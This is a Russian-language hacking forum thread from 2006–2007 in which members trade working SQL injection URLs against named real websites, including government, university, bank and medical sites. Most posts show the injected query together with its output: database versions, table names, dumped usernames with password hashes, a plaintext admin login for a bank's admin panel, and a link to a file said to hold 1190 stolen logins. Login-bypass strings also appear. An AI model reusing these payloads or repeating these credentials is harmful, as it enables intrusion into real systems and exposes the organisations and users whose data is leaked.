SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://www.cyclingnorthumbria.co.uk/pages/newscontent.php?ID=-5%20UNION%20SELECT%201,username,user_password,user_icq+FROM+forum_users/*
     
  2. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.continental-tc.ru/news.php?nid=-1+union+select+1,2,3,4,5,6,concat_ws(0x2F,version(),database(),user()),8/*

    4.0.27-max-log/cont86_cont/[email protected]

    -----------------------------------------------------------------------

    http://www.baykalclub.ru/news/news.php?id=-1'+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5/*

    4.0.26-log/udb3829/Uwww3829S@localhost
     
    1 person likes this.
  3. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    hpol.org
    Code:
    http://www.hpol.org/transcript.php?id=-1+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5/*
    5.0.27:hpol:ro@localhost
    29 таблиц:
    Code:
    http://www.hpol.org/transcript.php?id=-1+union+select+1,table_name,3,4,5+from+information_schema.tables+limit+28,1/*
    Интересных таблиц нет...
     
  4. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    PUGET SOUND-GEORGIA BASIN ENVIRONMENTAL INITIATIVE
    http://www.psat.wa.gov/

    Code:
    http://www.psat.wa.gov/Publications/news_stories/hoodcanal_news_story.php?id=-1+union+select+1,2,3,4,concat(aes_decrypt(aes_encrypt(user,0x71),0x71),0x3a,aes_decrypt(aes_encrypt(password,0x71),0x71),0x71),6,7,8+from+mysql.user/*
    4.1.8-standard
    root:*00EF6E5ADDE837A950A846F51A37244509B849DBq
     
    2 people like this.
  5. Muhacir

    Muhacir Elder - Старейшина

    Joined:
    5 Oct 2006
    Messages:
    91
    Likes Received:
    51
    Reputations:
    -2
    Calista Luxury Resort
    отель в анталии :)
    Code:
    http://www.calista.com.tr/calistaweb/news_read.asp?id=99999
     
  6. JIyka

    JIyka Member

    Joined:
    31 Oct 2007
    Messages:
    11
    Likes Received:
    9
    Reputations:
    5
    afilin@localhost:a_filin*5.0.27-log

    http://apteka-filin.dp.ua/artcl.php?artcl&id=-1+union+select+1,concat(user(),0x3a,database(),0x2a,version()),3,4,5,6/*
     
  7. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    НацинвестпромБанк
    Version: Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Developer Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
    Админка - http://www.nipbank.ru/admin/
    Логин: admin
    Пасс: nipb
    Мой первый инъект в asp)
     
    #3507 0nep@t0p, 1 Nov 2007
    Last edited: 1 Nov 2007
    3 people like this.
  8. JIyka

    JIyka Member

    Joined:
    31 Oct 2007
    Messages:
    11
    Likes Received:
    9
    Reputations:
    5
    http://www.rosmed.ru/_link_catch.php?link_id=-1+UNION+SELECT+1,2,3,4/*

    Идет редирект.
     
    2 people like this.
  9. l-l00K

    l-l00K Banned

    Joined:
    26 Nov 2006
    Messages:
    233
    Likes Received:
    433
    Reputations:
    287
    pereslavl.ru
    Code:
    http://www.pereslavl.ru/news/world_news.cgi?show_news=-69144+union+select+1,2,table_name,4,concat_ws(char(58),version(),user(),database()),6,7+from+information_schema.tables+limit+16,8+--+
    5.0.22-Debian_2-log:world_news@localhost:world_news

    Code:
    http://www.pereslavl.ru/forum/ftower.cgi?board_id=-31+union+select+1+from+information_schema.tables+--+
    скуля слепая

    Пробую
    Логин: admin'=1 OR 1=1/*
    Пароль: 123

    Захожу под Casper, пробую другие ники, все равно захажу как Casper, а он не админ
     
    1 person likes this.
  10. Scipio

    Scipio Well-Known Member

    Joined:
    2 Nov 2006
    Messages:
    733
    Likes Received:
    544
    Reputations:
    190
    2l-l00K

    делай так :admin'=1 OR 1=1 limit 2,1/*

    и лимитом переберай

    а вот вход под админом

    admin' or '1'='1
     
    #3510 Scipio, 1 Nov 2007
    Last edited: 1 Nov 2007
    1 person likes this.
  11. delay(0)

    delay(0) Member

    Joined:
    22 Nov 2006
    Messages:
    90
    Likes Received:
    41
    Reputations:
    6
    http://www.aim.edu/

    Code:
    http://www.aim.edu/faculty/facultyresume.asp?id=-1+or+1=(select+top+1+cast(username+as+nvarchar)%2B%27%3A%27%2Bcast(password+as+nvarchar)+from+Extuser+where+username+not+in+('gsbhatia','spprasu'))--
    Базы:
    AIMADB
    AIMBeta <- От сайта. Список таблиц:
    AIMDB
    AlumniPortal
    master
    Microfinance
    model
    msdb
    Northwind
    OSUSData
    pubs
    tempdb

    1190 пользователей (логин:пасс)
    http://www.rapidshare.com/files/66783989/lol.txt.html

    -------------

    Бесполезные скули :(

    http://www.marshall.edu <- нет таблиц, не присутствуют пользователи
    Code:
    http://www.marshall.edu/www/announce.asp?ID=240+or+1=(select+top+1+table_name+from+information_schema.tables)--
    http://appserv02.uncw.edu <- нет доступа к интересным базам\таблицам
    Code:
    http://appserv02.uncw.edu/news/article.asp?ID=-1+or+1=(select+@@version)--
    http://www.fisk.edu/ <- нет доступа к таблицам
    Code:
    http://www.fisk.edu/page.asp?id=72+or+1=(select+@@version)--
     
    3 people like this.
  12. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://www.bananas-gym.de/docs/newscontent.php?id=36%20UNION%20SELECT%201,username,3,user_password+FROM+phpbb_users/*
    Есть ещё таблица sites

    Так же есть поле user_icq но ничего не нашёл....короче только админить мона
     
  13. ЛифчиС5СВ

    ЛифчиС5СВ Elder - Старейшина

    Joined:
    9 Mar 2007
    Messages:
    164
    Likes Received:
    141
    Reputations:
    12
    Code:
    http://www.gamerevolution.com/news/view.php?id=-3369+union+select+1,2,concat(user(),0x3a,version(),0x3a,database()),4,5,6,7,8,9,10,11,12,13
    User: [email protected]
    Version: 4.1.21-standard-log
    Database: gamerev
     
    1 person likes this.
  14. Anna89

    Anna89 Member

    Joined:
    17 Oct 2006
    Messages:
    5
    Likes Received:
    9
    Reputations:
    24
    Code:
    http://www.dukemednews.duke.edu/gallery/index.php?letter=C&isAdmin=399998+union+select+1,version(),3/*
    Версия БД: 4.0.18
    База: news
    Юзер: [email protected]
     
    1 person likes this.
  15. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    нашёл 2 таблицы member и phpbb_users
     
    1 person likes this.
  16. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5

    есть ещё база mysql.user
    HTML:
    http://www.dukemednews.duke.edu/gallery/index.php?letter=C&isAdmin=399998+union+select+1,concat(user,0x3a,password),3+FROM+mysql.user/*
     
  17. KEHT33

    KEHT33 Elder - Старейшина

    Joined:
    26 Nov 2006
    Messages:
    49
    Likes Received:
    34
    Reputations:
    5
    HTML:
    http://www.ycegmbh.com/newscontent.php?id=-27%20UNION%20SELECT%201,name,pwd,4,5,6,7,8,9+FROM+admin

    adminка

    HTML:
    http://www.ycegmbh.com/admin/login.php?
     
    2 people like this.
  18. 0nep@t0p

    0nep@t0p Elder - Старейшина

    Joined:
    25 May 2007
    Messages:
    134
    Likes Received:
    216
    Reputations:
    17
    http://www.hawaii.gov
    Version: 4.1.12
    User: webuser@ahi

    1: administrator:5f4dcc3b5aa765d61d8327deb882cf99:password
    2: corinne:7c7727fdda7701ef4998d185b1357442:spoh

    http://grande.nal.usda.gov
    Version: 4.0.14-log
    User: gmoore@localhost
     
    #3518 0nep@t0p, 2 Nov 2007
    Last edited: 3 Nov 2007
    4 people like this.
  19. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    Код:

    http://www.soldatru.ru/subject_index/subject_show.php?id=-12+union+select+1,table_name,3,4,5,6,7,8,9,10+from+information_schema.tables/*
    дальше не рыл-смеялся над ответом сервера

    код:

    http://eroshop.com.ua/?sec=forum&fit=-20768+union+select+1,2,3,4,5,cast(concat(login,0x3a,password)+as+binary),7,8,9,10+from+users/*
    заходим как админ...
     
    4 people like this.
  20. fRg

    fRg Active Member

    Joined:
    28 Dec 2006
    Messages:
    111
    Likes Received:
    172
    Reputations:
    0
    pcper.com - PC Perspective
    Code:
    http://www.pcper.com/news.php?s=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user()),10,11,12,13,14,15/*
    5.0.22:pCPerspective:root@localhost
    34 таблицы:
    Code:
    http://www.pcper.com/news.php?s=-1+union+select+1,2,3,4,5,6,7,8,table_name,10,11,12,13,14,15+from+information_schema.tables+limit+33,1/*
    Интересных таблиц не нашёл... :mad:
     
    1 person likes this.
Thread Status:
Not open for further replies.